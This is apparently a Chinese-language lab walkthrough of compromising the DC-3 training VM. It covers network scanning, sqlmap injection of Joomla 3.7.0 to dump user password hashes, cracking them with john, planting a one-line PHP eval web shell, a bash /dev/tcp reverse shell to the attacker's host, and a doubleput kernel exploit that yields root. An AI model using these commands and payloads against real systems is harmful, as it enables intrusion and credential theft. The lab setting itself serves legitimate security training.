提示:仅供学习参考,勿盗用,谢谢
前言
本文章主要讲解DC-3主机渗透全过程
提示:以下是本篇文章正文内容,可供参考
一、配置
DC-3主机渗透
网络适配器打开VMnet8;
在VMware中文件 -- 打开 -- 导入DC-3;
开启kali、DC-3.
kali作为攻击机 ip地址:192.168.159.128
DC-3 ip:192.168.159.133
注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-3虚拟机设置-网络适配器使用NAT模式;DC-3虚拟机设置DC/DVD(IDE)-高级-IDE(D)修改为IDE 0:0。如下图:
二、步骤
1.发现目标主机ip:
代码如下:
arp-scan -l
2.收集目标主机端口信息:
代码如下:
nmap -sV -p- 192.168.159.133
3.访问目标主机80端口
4.收集目标主机的web信息
whatweb http://192.168.159.133
发现Joomla框架(CMS)
5.利用joomscan进行Joomla框架扫描
joomscan是Joomla框架的专属扫描工具
joomscan --url http://192.168.159.133
发现 Joomla 版本是3.7.0
发现后台管理页面 http://192.168.159.133/administrator/
(后台管理页面也可以用dirb http://192.168.159扫描)
6.搜索寻找Joomla版本是否有漏洞
searchsploit joomla 3.7.0
7.选择sql注入攻击脚本
8.查看SQL注入漏洞对应的文件42033.txt
cat php/webapps/42033.txt 不成功
find / -name 42033.txt
cat usr/share/exploitdb/exploits/php/webapps/42033.txt
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
9.根据42033.txt提示进行sqlmap注入或手工注入
查询数据库:
sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查询表名:
sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
查询列:
sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" --columns -p list[fullordering]
注出数据:
sqlmap -u "http://192.168.159.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -T "#__users" -C username,password --dump -p list[fullordering]
注出结果:
10.破解密文
将密文编辑到txt文件,使用john工具破解密文:
解出口令为snoopy
11.登录网站后台,写入一句话木马
找到Templates -- Beez3 -- New File -- 创建PHP文件 -- 写入一句话木马 --save
一句话木马代码:
<?php
@eval($_POST[1]);
?>
12.蚁剑连接
连接成功后,右键打开虚拟终端,反弹shell
在kali打开终端输入命令:nc -lnvp 4444
蚁剑虚拟终端输入命令:bash -c 'sh -i &>/dev/tcp/192.168.159.128/4444 0>&1'
13.收集主机内核版本信息和操作系统版本信息
uname -a
cat /etc/issue
14.搜索提权漏洞
searchsploit Ubuntu 16.04
在这里选择39772.txt文件
15.找到39772.txt漏洞脚本
find / -name 39772.txt
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
16.下载39772.zip漏洞执行压缩包
此链接国内无法访问,懂得都懂
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
17.上传漏洞提权包至靶机
考虑蚁剑上传39772.zip:
18.解压39772.zip
如图所示命令操作:
19.解压exploit.tar
20.执行脚本文件
./compile.sh
./doubleput
21.成功获得root权限,进入root目录查看
cd /root
ls
cat the-flag.txt
成功查看flag文件,渗透完成!
总结
以上就是今天要讲的内容,本文详细介绍了DC-3渗透主机的使用。